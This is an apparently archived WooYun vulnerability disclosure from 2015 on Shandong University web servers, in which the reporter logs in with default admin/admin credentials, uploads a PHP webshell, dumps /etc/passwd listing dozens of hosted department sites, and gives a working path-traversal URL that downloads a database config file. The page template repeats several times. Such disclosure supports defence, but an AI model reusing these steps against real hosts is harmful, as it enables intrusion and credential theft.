山东大学数十同服网站沦陷Getshell | wooyun-2015-0146556| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146556

漏洞标题：山东大学数十同服网站沦陷Getshell

漏洞作者： j0k3r

提交时间：2015-10-14 09:59

修复时间：2015-11-28 14:20

公开时间：2015-11-28 14:20

漏洞类型：后台弱口令

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-14：细节已通知厂商并且等待厂商处理中
2015-10-14：厂商已经确认，细节仅向厂商公开
2015-10-24：细节向核心白帽子及相关领域专家公开
2015-11-03：细节向普通白帽子公开
2015-11-13：细节向实习白帽子公开
2015-11-28：细节向公众公开

简要描述：

提交几次漏洞，一次都没通过，只求一个邀请码，这么难哪

详细说明：

入手点：http://www.ncmg2010.sdu.edu.cn/admin/ 
username/password：admin/admin
进入后台，找到上传点，上传处虽然有文件格式显示，但是仍然可以上传php，故而我们上传一句话，拿到shell,如图












由于网站不能直接跨目录，我们利用菜刀中的终端试下
尝试执行命令





Okay！
来到根目录，





接下来我们来看看服务器上有哪些站点，来到/etc/passwd,查看
<code>ygc:x:510:510:医管处:/home/ygc/./wwwroot:/sbin/nologin
ipo:x:511:511::/home/ipo2/./wwwroot:/sbin/nologin
bioinfo:x:512:512::/home/bioinfo/./wwwroot:/sbin/nologin
zzzx:x:513:513::/home/zzzx1/./wwwroot:/sbin/nologin
cie:x:514:514::/home/cie/./wwwroot:/sbin/nologin
cmhi:x:515:515::/home/cmhi/./wwwroot:/sbin/nologin
wljy:x:516:516::/home/wljy/./wwwroot:/sbin/nologin
sp:x:517:517::/home/sp/./wwwroot:/bin/nologin
blsl:x:518:519::/home/blsl/./wwwroot:/sbin/nologin
cmse:x:519:520::/home/cmse/./wwwroot:/sbin/nologin
fls:x:520:521::/home/fls/./wwwroot:/sbin/nologin
infosec:x:521:522::/home/infosec/./wwwroot:/sbin/nologin
japanlawinfo:x:522:523::/home/japanlawinfo/./wwwroot:/sbin/nologin
yjsh:x:523:524::/home/yjsh/./wwwroot:/sbin/nologin
mbmr:x:524:525::/home/mbmr/./wwwroot:/sbin/nologin
icm:x:525:526::/home/icm/./wwwroot:/sbin/nologin
lhp:x:526:527::/home/lhp/./wwwroot:/sbin/nologin
gfy:x:528:529:国防院:/home/gfy/./wwwroot:/sbin/nologin
caolh:x:529:530::/home/caolh:/bin/bash
qlng:x:531:533:齐鲁医院农工党:/home/qlng/./wwwroot:/bin/nologin
xyy:x:532:534:校医院:/home/xyy/./wwwroot:/bin/nologin
summer:x:533:535:教务处暑期学校:/home/summer/./wwwroot:/bin/nologin
art:x:534:536:艺术学院:/home/art/./wwwroot:/bin/nologin
fbjf:x:535:537:数学学院复变积分:/home/fbjf/./wwwroot:/bin/nologin
cah:x:536:538:土建与水利实验教学示范中心:/home/cah/./wwwroot:/bin/nologin
jjh:x:537:539:教育基金会:/home/jjh/./wwwroot:/bin/nologin
jgdw:x:538:540:机关党委:/home/jgdw/./wwwroot:/bin/nologin
njournal:x:539:541:学报:/home/njournal/./wwwroot:/bin/nologin
njournal1:x:540:542:xuebao:/home/njournal1/./wwwroot:/bin/nologin
njournal2:x:541:543:xuebao:/home/njournal2/./wwwroot:/bin/nologin
njournal3:x:542:544:xuebao:/home/njournal3/./wwwroot:/bin/nologin
njournal4:x:543:545:xuebao:/home/njournal4/./wwwroot:/bin/nologin
vhost2:x:544:546::/home/vhost2/./wwwroot:/bin/nologin
wszyjy:x:545:547:文史哲研究院:/home/wszyjy/./wwwroot:/bin/nologin
ppcb:x:546:548:品牌与传播研究所:/home/ppcb/./wwwroot:/bin/nologin
xwgk:x:547:549:校办的校务公开网:/home/xwgk/./wwwroot:/bin/nologin
hqc:x:548:550::/home/hqc/./wwwroot:/bin/nologin
crystal:x:549:551::/home/crystal/./wwwroot:/bin/nologin
camm:x:550:552::/home/camm/./wwwroot:/bin/nologin
huanke:x:551:553:huanjingkexueyuan:/home/huanke/./wwwroot:/bin/nologin
wxl:x:552:554::/home/wxl:/bin/bash
skc:x:553:555::/home/skc2/./wwwroot:/bin/nologin
cbs:x:554:556::/home/cbs/./wwwroot:/bin/nologin
zzgc:x:555:557::/home/zzgc/./wwwroot:/bin/nologin
plaoffice:x:556:558::/home/plaoffice/./wwwroot:/bin/nologin
xzxx:x:557:559:党委学校办公室:/home/xzxx/./wwwroot:/bin/nologin
sdutc:x:558:560:土建与水利学院交通规划研究中心:/home/sdutc/./wwwroot:/bin/nologin
bgs:x:559:561:校办:/home/bgs/./wwwroot:/bin/nologin
sdeac:x:561:563:经济学年会:/home/sdeac/./wwwroot:/bin/nologin
rie:x:562:564:产业经济评论:/home/rie/./wwwroot:/bin/nologin
zscq:x:563:565:科技处知识产权网:/home/zscq/./wwwroot:/bin/nologin
mla:x:564:566:图像处理与模式识别研究组:/home/mla/./wwwroot:/bin/nologin
rcsm:x:565:567:可持续制造研究中心:/home/rcsm/./wwwroot:/bin/nologin
nwhxq:x:566:568:南外环新区:/home/nwhxq/./wwwroot:/bin/nologin
plant:x:567:569::/home/plant/./wwwroot:/bin/nologin
emba:x:568:570::/home/emba/./wwwroot:/bin/nologin
art2:x:569:571::/home/art2/./wwwroot:/bin/nologin
bxmyeast:x:570:572:酵母遗传学及分子生物学课题组:/home/bxmyeast/./wwwroot:/bin/nologin
jj:x:571:573:基建处:/home/jj/./wwwroot:/bin/nologin
yjfz:x:572:574:幼儿教育发展中心:/home/yjfz/./wwwroot:/bin/nologin
xxgk:x:573:575:信息公开:/home/xxgk/./wwwroot:/bin/nologin
me:x:575:577:管理学院工程硕士教育中心:/home/me/./wwwroot:/bin/nologin
korea:x:576:578:朝鲜语系:/home/korea/./wwwroot:/bin/nologin
ieet:x:578:580:产业经济研究所:/home/ieet/./wwwroot:/bin/nologin
function:x:579:581:医学院机能教学实验室:/home/function/./wwwroot:/bin/nologin
media:x:580:582:宣传部宣传科:/home/media/./wwwroot:/bin/nologin
nprmeeting:x:581:583:药学院npr会议:/home/nprmeeting/./wwwroot:/bin/nologin
gsp:x:582:584:加拿大高等教育:/home/gsp/./wwwroot:/bin/nologin
lcyxtszy:x:583:585:医学院本科教育:/home/lcyxtszy/./wwwroot:/bin/nologin
eera:x:584:586:能效研究:/home/eera/./wwwroot:/bin/nologin
mbbs:x:585:587:医学院临床留学生:/home/mbbs/./wwwroot:/bin/nologin
dcd:x:586:588:合作发展部:/home/dcd/./wwwroot:/bin/nologin
arrc:x:587:589:经济学院:/home/arrc/./wwwroot:/bin/nologin
mti:x:588:590:外国语学院翻译硕士管理中心:/home/mti/./wwwroot:/bin/nologin
gnhz:x:589:591:合作发展部国内合作办公室:/home/gnhz/./wwwroot:/bin/nologin
ncmg2010:x:590:592:医学院遗传所:/home/ncmg2010/./wwwroot:/bin/nologin

呵呵，进入home目录下看看

222
arrc
art
art2
bgs
bioinfo
blsl
bxmyeast
cah
camm
caolh
cbs
chkdirquota.sh
clamav
cmhi
cmse
crystal
dcd
eera
emba_2013626wxl
fbjf
flc
fls
fls.bak.090302.cao
function
gaojiao_2013626wxl
gfy
ggq
gnhz
gsp
hostadm
hqc
huanke
icm_2013626wxl
ieet
iep
infosec
io_2013626wxl
ipo2
japanlawinfo
jgdw
jj
jjh_2013626wxl
korea
lcyxtszy
lhp
logbak
lost+found
lynn
mbbs_2013626wxl
mbmr
me_2013626wxl
media
mla
mti
mysql
nc
ncmg2010
newsuser
njournal1
njournal2
njournal_2013626wxl
njournal3
njournal4
nprmeeting_2013626wxl
nwhxq
plant
plaoffice_2013626wxl
ppcb
qlng
rcsm
rie
rsc
sdeac
sdry_2013626wxl
sdutc
skc2
sp
sp_bak
summer
test
userlist.txt
vhost2
wljy_2013626wxl
wszyjy
www
wxl
xlzx
xwgk
xxgk_2013626wxl
xyy
xzxx
ygc
yjfz
yjsh
zscq
zzgc
zzzx1

几十个。。。
我们可以依次把我们的一句话拷贝到各个网站的可写目录下getshell...

依次get

okay。。
补充一下：这个站http://www.ncmg2010.sdu.edu.cn还存在任意文件下载漏洞，
http://www.ncmg2010.sdu.edu.cn/downloadfile.php?path=../admin/config.php

下载/wwwroot/admin/config.php获取数据库配置信息
如图

</code>

漏洞证明：

修复方案：

版权声明：转载请注明来源 j0k3r@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-10-14 14:18

厂商回复：

已经通知该系统所属的单位处置了，谢谢您

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146556

漏洞标题：山东大学数十同服网站沦陷Getshell

相关厂商：山东大学

漏洞作者： j0k3r

提交时间：2015-10-14 09:59

修复时间：2015-11-28 14:20

公开时间：2015-11-28 14:20

漏洞类型：后台弱口令

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 j0k3r@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146556

漏洞标题：山东大学数十同服网站沦陷Getshell

相关厂商：山东大学

漏洞作者： j0k3r

提交时间：2015-10-14 09:59

修复时间：2015-11-28 14:20

公开时间：2015-11-28 14:20

漏洞类型：后台弱口令

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0146556"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 j0k3r@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：